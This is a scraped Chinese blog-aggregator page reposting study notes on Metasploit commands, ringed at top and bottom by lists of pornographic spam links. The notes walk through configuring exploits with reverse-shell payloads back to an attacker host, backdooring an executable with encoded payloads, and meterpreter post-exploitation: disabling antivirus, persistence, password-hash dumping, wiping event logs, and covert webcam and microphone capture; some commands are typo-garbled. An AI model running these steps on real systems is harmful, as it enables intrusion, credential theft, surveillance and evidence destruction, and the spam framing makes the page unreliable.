日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

MSF(二):msf外部/内部常用命令

發布時間:2023/12/31 编程问答 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 MSF(二):msf外部/内部常用命令 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

msf外內部常用命令

安全牛學習Metasploit Framework筆記

1、msf外部命令
  • msfconsole -h/-q/-r/-v/exit
    msf的幫助信息/安靜啟動,沒有banner/使用msfconsole自動化執行rc文件里的內容/msf版本/退出msf
  • help/?/help xxx
    幫助信息/幫助信息/查看具體名稱的幫助i信息
  • service postgresql start
    啟動數據庫
2、msf內部基本命令

(1)基本命令

  • resource xx.rc
    在msf內部自動化執行該文件,rc是資源文件的標準擴展名,msfconsole -r xx.rc是一樣的效果,只不過msfconsole需要先打開msf控制臺,再執行xx.rc資源文件
  • banner/color/connect -h
    msf標語,簡單介紹/color true or false or auto/類似nc
  • show auxiliary / exploits / payloads / encoders / nops/post
    輔助模塊/攻擊代碼/攻擊載荷/編碼/payload的穩定與維持大小/后滲透
  • search xxx / help search
    搜索xxx利用攻擊模塊/search查詢幫助
  • search name:mysql/search name:mysql type:auxiliary
    單條件搜索/多條件搜索
  • use dos/windows/smb/ms09_001_write
    使用攻擊模塊
    進入攻擊模塊后:show options / payloads / targets / advanced / evasion/missing
    顯示配置信息/顯示適用于當前exploit利用模塊的payloads,并不顯示全部/指定目標系統,一般都會選擇,系統默認的攻擊成功率不高/顯示高級參數配置/作逃避,繞過的配置/顯示哪個參數必須設置的但還沒有設置的
  • info/edit
    獲取模塊的基本信息/編輯當前exploit模塊的代碼
  • Check /back
    配置完成后,在exploit之前判斷目標ip漏洞是否存在,并不是所有exploit模塊存在check,只有少數/返回上一層,類似linux中的cd ..,但無法退出msf,退出使用exit
  • db_status / db_rebuild_cache/db_disconnect/db_connect/db_nmap
    數據庫連接信息/MSF所有的模塊都保存在/usr/share/metasploit-framework/modules/,因為在msf內部使用文件搜索較慢,所以將所有模塊緩存到msf的數據庫里,那么搜索的速度就會變快,目的:啟動一個任務,在msf數據庫中,創建一個所有模塊的cache,提高搜索速度/斷開msf和當前數據庫的連接/連接指定數據庫連接的配置文件,例:db_connect -y /usr/share/metasploit-framework/config/database.yml,還有不懂得可以db_connect -h查看相關配置信息/集成在msf中的nmap,和外部的nmap使用和效果一樣,唯一不同的就是,msf中的nmap掃描結果會自動保存在msf數據庫中
  • hosts / hosts 1.1.1.1 / hosts -u / hosts -c address,os_flavor -S Linux
    查看當前數據庫中已掃描到的主機信息/查看指定IP的主機信息/查看哪些主機是開機up狀態/查看指定列的信息/搜索包含指定字符串的內容
  • services/services -p 80 / services -c info,name -p 1-1000 192.168.100.141
    顯示已掃描到主機的端口信息/搜索指定已掃描主機開放的指定端口/搜索指定列、端口、IP的信息
  • vulns / creds (mysql_login) / loot (hashdump)
    查看已經攻擊成功的漏洞信息/顯示攻擊成功時的服務的賬號和密碼信息/hash值的破解
  • db_import /xx/xx/xx.xml/ db_export -f xml /xx/xx/xx.xml
    數據庫導入/數據庫導出
  • set / unset / setg / unsetg / save
    設置參數/取消設置的參數/全局設置參數,只要有模塊里有該參數,值都為我們之前已經全局設置的/取消全局變量的設置/保存當前msf會話內的配置,退出后重新登陸msf配置依舊存在,如果想恢復初始的樣子,那就刪掉這個保存的配置文件,重啟msfconsole
  • run / exploit/exploit -j
    兩個命令一樣的,auxiliary模塊常用run,exploits模塊常用exploit,這是建議,實際用哪個都一樣/拿到shell不會立馬進入shell,以后臺的進程存在
  • jobs/ kill 0
    在后臺運行的job/kill id值
  • load / unload loadpath
    調入插件,連接外部的插件/關閉調用外部插件/眾所周知,msf的所有模塊都在/sur/share/metasploit-framework/modules下,loadpath可以調用其它指定目錄里的模塊,比如自己開發或編寫的模塊
  • sessions or sessions-I/sessions -i (Shell 、Meterpreter session、VNC)
    獲得的shell連接會話,已經建立的session//進入指定id的session
  • route通過指定session路由流量
    指定一個session,以后朝向對方內網的流量,都通過這個session id建立的連接,進行流量轉發,相當于這個session id就是中轉站
  • irb (Framework::Version)
    進入msf的內部開發模式,可以執行一些內部函數,也可以開發自己的模塊等等

(2)Exploit模塊

  • Active exploit(主動攻擊,主要是服務端的漏洞,將payload發送給目標服務端偵聽的端口)這個就是我們直接攻擊,不開防火墻可以,開了不行
    use exploit/windows/smb/psexec
    該模塊是在遠程目標系統上執行程序
    set RHOST192.168.1.100
    set PAYLOAD windows/shell/reverse_tcp
    set LHOST 192. 168.1.1
    set LPORT 4444
    set SMBUSER user1
    set SMBPASS pass1
    exploit
  • Passive Exploits(被動攻擊,主要是客戶端的程序)這個就是我們設陷阱,等目標上鉤,這個可以針對開了防火墻的,配合社會工程學
    use exploit/windows/browser/ms07_017_ani loadimage_chunksize
    set URIPATH /
    set PAYLOAD windows/shel/reverse tcp
    set LHOST 192. 168.1.1
    set LPORT 4444
    exploit

(3)生成payload
use payload/windows/shell bind_ tcp
(4)使用payload

  • generate(壞字符)
    使用generate生成一個payload
  • generate -b '\x00'/generate -b '\x00\x44\x67\x66\xfalx01\xe0\x44\x67\xa1\xa2\xa3x75\x4b'/generate -b \'x00\x44\x67\x66\lxfa\x01\xe0\x44\x67xa1xa2lxa3\x75\x4b\xFF\x0a\x0b\x01\xcc\6e\x1e\x2e\x26'
    msf自動選擇編碼模塊繞過壞字符,避免在shellcode中出現的壞字符,常用過濾的是\x00、\xff,都是使用encoder過濾引號中的壞字符
    show encoders / generate -e x86/nonalpha
    顯示編碼類型/手動指定編碼模塊
    generate -b \x00' -t exe -e x86/shikata_ga_ nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f /root/1.exe
    -b過濾encoser壞字符,-t指定輸出格式,可為c、exe等等,-e指定encoder類型,-i使用編碼的次數,多輪編碼,-k不產生新的進程,只產生新的線程,更隱蔽,-x將payload和指定模板綁定在一起,-f輸出指定文件。注:最后可利用文件為1.exe
  • NOP=no-operation=Next Operation (無任何操作)
    當CPU執行到NOP,就順則會往下滑,滑到有操作的位置,EIP返回到存儲NOP sled的任意地址時將遞增,最終導致shellcode執行,例:generate -s 14,在payload前面加14位NOP
3、meterpreter基本命令
  • Help/background
    幫助信息/從seesion中退出,但保存session的連接
  • run/bgrun killav/bgrun persistence/bgrun hashdump/bgrun vnc/sound_recorder/webcam/winbf
    前臺運行指定命令/后臺與運行,關閉殺毒軟件/建立持久連接,將shellcode寫入系統文件,開機自啟/開啟圖形化遠程管理/錄制聲音/開啟攝像頭/讓肉雞幫忙暴力破解密碼,利用肉雞資源
  • cd/ls/cat/pwd/dir/mkdir/mv/rm/rmdir/edit/可以使用linux命令
    進入/顯示文件/查看/顯示當前路徑/顯示文件/創建目錄/移動/刪除/刪除目錄/編輯
  • lpwd/lcd 本地目錄
    local當前的工作目錄,就是在kali上的我們使用的工作目錄/進入我們本地目錄
  • clearev/download/upload /usr/share/windows binaries/nc.exe c:\\windows\\system32
    刪除目標系統日志/下載文件到本地/上傳本地文件到目標系統
    注:因為\在linux中有轉義符的含義,所以執行linux命令時要用兩個\表示目標windows的\
  • win+r eventvwr
    windows日志查看
  • execute -f cmd.exe -i -H
    -f執行目標系統里的哪個程序,-i和執行的這個程序進行交互,-H將這個程序窗口隱藏起來執行
  • getuid/getsystem/getprivs/getproxy/getpid/migrate
    以哪個用戶賬號登陸到目標系統的/強制獲取成system賬號,獲得系統權限/查看當前用戶權限/獲取目標系統代理信息/查看當前shellcode的線程在目標系統哪個進程當中/遷移線程到其它進程中
  • hashdump/run post/windows/gather/hashdump
    系統賬號哈希值/系統賬號哈希值
  • sysinfo/ps/kill/reboot/shutdown/shell
    目標系統信息/查看進程/查殺進程/重啟/關閉/獲得一個目標操作系統的shell,退出到meterpreter用exit
  • show_mount/search -f autoexec.bat
    當前掛載了幾個系統分區/搜索目標系統中的文件
  • arp/netstat/ipconfig/ifconfig/route
    查看目標機器的arp緩存/查看目標端口連接/ip地址/ip地址/查看目標路由表
  • idletime/resource
    查看目標操作系統空閑時間/調用外部的資源文件,自動化執行
  • record_mic/webcam_list/webcam_snap -i 1 -v false
    記錄目標麥克風的聲音/列出目標系統上所有的攝像頭/每隔一秒鐘用攝像頭拍照一次
4、meterpreter python 擴展

(1)2015年11月份,來自社區的貢獻
無需運行環境,在客戶端運行原生python代碼
就是不需要編譯python,目標系統沒有python解釋器,也可以執行
使用示例:

- load python加載python插件 - Help幫助 - python_execute "print ('asdasdas')"執行python代碼 - python_execute "import oS;cd = os.getcwd()" -r cd-r是顯示cd變量的值 - python_import -f find.py

(2)msfcli
201 5年6月已經被取消,由msfconsole -x取代,編寫腳本時便于引用
msfconsole -x "use exploit/windows/smb/ms08_ 067 netapi; set RHOST 1.1.1.1; set PAYLOAD windows/meterpreter/reverse_ tcp; set LHOST 1.1.1 .8; set LPORT 5555; set target 34;exploit"

創作挑戰賽新人創作獎勵來咯,堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的MSF(二):msf外部/内部常用命令的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 国产精品111| 日韩视频在线观看二区 | 熟妇高潮精品一区二区三区 | 国产污视频在线观看 | 国产精品资源在线 | 国产伦人伦偷精品视频 | 麻豆三级视频 | 波多野结衣国产在线 | 日韩有码专区 | 98精品国产 | 99热伊人| 一级作爱视频 | 欧美日韩性生活 | 日韩理论在线 | 小sao货大ji巴cao死你 | 在线看片黄| 影音先锋黄色资源 | 免费99精品国产自在在线 | 农民人伦一区二区三区 | 永久免费视频网站直接看 | 中文字幕二区 | av噜噜| 91国在线| 欧美一区不卡 | 日韩福利电影在线 | 免费无码又爽又黄又刺激网站 | 亚洲精品免费网站 | av中文字幕在线免费观看 | 大乳丰满人妻中文字幕日本 | 欧美极品一区二区 | 天堂资源| 天天欲色 | 中文字幕亚洲乱码熟女一区二区 | 日韩电影一区二区在线观看 | av解说在线观看 | a毛片视频 | 欧美一区二区不卡视频 | 国产又黄又嫩又滑又白 | 国产亚洲天堂网 | 日韩中文字幕在线观看视频 | 人人草人人看 | 一区二区三区在线观看免费视频 | 美利坚合众国av | 99re6在线观看| 中文字幕一区二区视频 | caopeng视频 | 驯服少爷漫画免费观看下拉式漫画 | 亚洲一区二区三区电影在线观看 | 欧美日韩在线观看成人 | 国产无| 一区二区日韩精品 | 黄色免费网站在线观看 | 欧美三级国产 | 精品一区二区视频在线观看 | 伊人网在线视频 | 99视频99| 少妇闺蜜换浪荡h肉辣文 | 伊人久久影视 | 日日操网站 | 国产熟女一区二区 | 蜜桃av网站 | 超碰c| 中文字幕欲求不满 | 黄色网页在线播放 | 亚洲男人天堂2017 | 国产十区| 国产伦精品一区二区三区免.费 | 男女裸体无遮挡做爰 | 久久免费视频播放 | 免费av网址在线 | 91网页在线观看 | 日韩人妻无码一区二区三区 | 中文字幕在线观看视频一区 | 国产偷人爽久久久久久老妇app | 男女那个视频 | 一级中文字幕 | 国产欧美日韩二区 | 国产乱free国语对白 | 久久九九久精品国产免费直播 | 精品国产午夜 | 国产电影一区二区三区爱妃记 | 亚洲av永久无码精品 | 一本色道久久hezyo无码 | 精品3p| 日韩一级黄色片 | 亚洲影院中文字幕 | 国产综合色视频 | 香蕉视频久久久 | 精品欧美激情精品一区 | 先锋av在线资源 | 精品久久网 | 成人免费a级片 | 熟女俱乐部五十路六十路av | 久久久久久久久久久久久久国产 | 久久久黄色 | 色婷婷狠狠干 | 美日韩成人 | 国产精品一二区 | 黄色小视频免费观看 |